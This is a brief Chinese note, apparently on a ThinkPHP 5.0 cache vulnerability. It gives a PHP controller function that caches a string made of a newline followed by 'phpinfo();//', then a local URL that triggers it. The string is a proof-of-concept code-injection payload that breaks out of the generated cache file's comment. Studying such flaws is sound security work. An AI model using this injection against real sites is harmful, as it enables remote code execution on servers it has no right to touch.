漏洞代码: public function myCache(){ $a = "\nphpinfo();//"; Cache::set("hack to cache",$a); return "cache ok!!!"; } 访问:http://tp50.com/index.php/index/index/myCache 来源:https://www.cnblogs.com/zpchcbd/p/12546340.html 标签 缓存